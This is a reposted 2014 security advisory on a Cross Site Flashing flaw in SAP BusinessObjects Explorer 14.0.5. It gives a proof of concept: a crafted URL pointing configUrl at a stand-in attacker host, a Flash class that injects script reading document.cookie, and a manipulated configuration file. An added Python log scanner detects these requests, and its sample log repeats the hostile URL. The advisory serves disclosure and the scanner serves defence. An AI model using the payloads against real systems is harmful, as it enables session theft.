
SAP BusinessObjects Explorer 14.0.5 Cross Site Flashing

10 Oct 2014 | Reported by Stefan Horlacher | Type: packetstorm | Source: packetstormsecurity.com

SAP BusinessObjects Explorer 14.0.5 Cross Site Flashing vulnerability, allowing remote session thef

Code
`#######################################################################  
#  
# COMPASS SECURITY ADVISORY  
# http://www.csnc.ch/en/downloads/advisories.html  
#  
#######################################################################  
#  
# Product: BusinessObjects Explorer  
# Vendor: SAP AG  
# Subject: Cross Site Flashing  
# Risk: High  
# Effect: Remotely exploitable  
# Author: Stefan Horlacher  
# Date: 2014-10-10  
# SAP Security Note: 1908647 [0]  
#  
#######################################################################  
  
Abstract:  
-------------  
BusinessObjects Explorer is vulnerable to Cross Site Flashing [1]  
attacks, allowing an attacker to e.g. steal the victim's session.  
This vulnerability requires the victim to click on a malicious link  
prepared by the attacker.  
  
  
Affected:  
---------  
Vulnerable:  
SAP BusinessObjects Explorer version 14.0.5 (build 882)  
  
Not tested:  
Other versions of BusinessObjects Explorer  
  
  
Technical Description:  
----------------------  
The Flash file suffers from a Cross Site Flashing vulnerability. It  
is possible to directly load and display the  
com_businessobjects_polestar_bootstrap.swf Flash file and specify a   
configUrl. This requires the victim to be logged in, and the attacker  
needs to know the /webres/ URL, which is known as soon as the attacker  
is in possession of valid credentials. The configuration file specified  
in the configUrl parameter may reside on a foreign host. The   
configuration file itself may contain URLs of further Flash files   
residing on a foreign domain. If successful, the victim loads foreign   
Flash files, which leads to Cross Site Flashing. The example below   
loads a Flash file, which injects JavaScript into the DOM of the   
originating domain.  
  
  
URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_polestar_bootstrap.swf?configUrl=http://example.com/attacker_flash_config.xml  
  
  
Code of the injected Flash file referenced in http://example.com/attacker_flash_config.xml  
package  
{  
import flash.display.Sprite;  
import flash.events.Event;  
import flash.external.ExternalInterface;  
  
public class Main extends Sprite  
{  
public function Main():void  
{  
ExternalInterface.call("document.write",  
"<script>alert(document.cookie)</script>");  
}  
}  
}  
  
Extract of the manipulated configuration file http://example.com/attacker_flash_config.xml:  
<p:configuration xmlns:p="http://www.businessobjects.com/2007/platform"  
p:codebase="plugins/">  
<p:splashLocation p:id="com_businessobjects_polestar_splashscreen"  
p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>  
<p:bundles>  
<p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>  
<p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/>  
<p:bundle p:id="com_businessobjects_polestar_dataprovider_xl" p:codebase="http://example.com/"/>  
<p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="http://example.com/"/>  
[CUT BY COMPASS]  
  
  
Timeline:  
---------  
2013-06-06: Discovery by Stefan Horlacher  
2013-06-26: Initial vendor notification  
2013-12-10: Vendor releases patch and SAP Security Note 1908647  
2014-10-10: Disclosure of the advisory  
  
  
References:  
-----------  
[0] https://service.sap.com/sap/support/notes/1908647  
[1] https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project  
`
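
A detection check for the request pattern in the Technical Description, added here as an example and not part of the Compass advisory: it scans web access logs for requests to com_businessobjects_polestar_bootstrap.swf whose configUrl points at a host other than the deployment's own. The trusted hostname, the combined log format, the `PLACEHOLDER` path segment and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

SWF_NAME = "com_businessobjects_polestar_bootstrap.swf"
# Assumption: hostnames under which this Explorer deployment is legitimately served.
TRUSTED_HOSTS = {"bo.intranet.example"}
# Request target from a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def external_config_host(target, trusted=TRUSTED_HOSTS):
    """Return the untrusted host named in configUrl, or None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/" + SWF_NAME):
        return None
    # parse_qsl percent-decodes, so encoded values are compared in clear form.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() != "configurl":  # name matched case-insensitively to be safe
            continue
        # Absolute and protocol-relative (//host/...) values carry a hostname;
        # relative paths do not and stay on the serving origin.
        host = (urlsplit(value.strip()).hostname or "").lower()
        if host and host not in trusted:
            return host
    return None

def scan(lines):
    """Return (client, foreign_host) for every suspicious request line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        host = external_config_host(m.group(1)) if m else None
        if host:
            hits.append((line.split()[0], host))
    return hits

# Constructed sample log; PLACEHOLDER stands in for the /webres/ segment cut in the advisory.
BASE = "/explorer/webres/PLACEHOLDER/" + SWF_NAME
SAMPLE_LOG = [
    f'192.0.2.10 - - [10/Oct/2014:10:00:01 +0000] "GET {BASE}?configUrl=http://example.com/attacker_flash_config.xml HTTP/1.1" 200 5120',
    f'192.0.2.11 - - [10/Oct/2014:10:00:05 +0000] "GET {BASE}?CONFIGURL=%2F%2Fexample.net%2Fc.xml HTTP/1.1" 200 5120',
    f'192.0.2.12 - - [10/Oct/2014:10:00:09 +0000] "GET {BASE}?configUrl=config/default.xml HTTP/1.1" 200 5120',
    f'192.0.2.13 - - [10/Oct/2014:10:00:12 +0000] "GET {BASE}?configUrl=https://bo.intranet.example/explorer/config.xml HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, host in scan(SAMPLE_LOG):
        print(f"{client} requested the bootstrap SWF with configUrl on foreign host {host}")
```

Hits identify sessions that may have loaded foreign Flash content; the fix itself is the vendor patch referenced in SAP Security Note 1908647.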
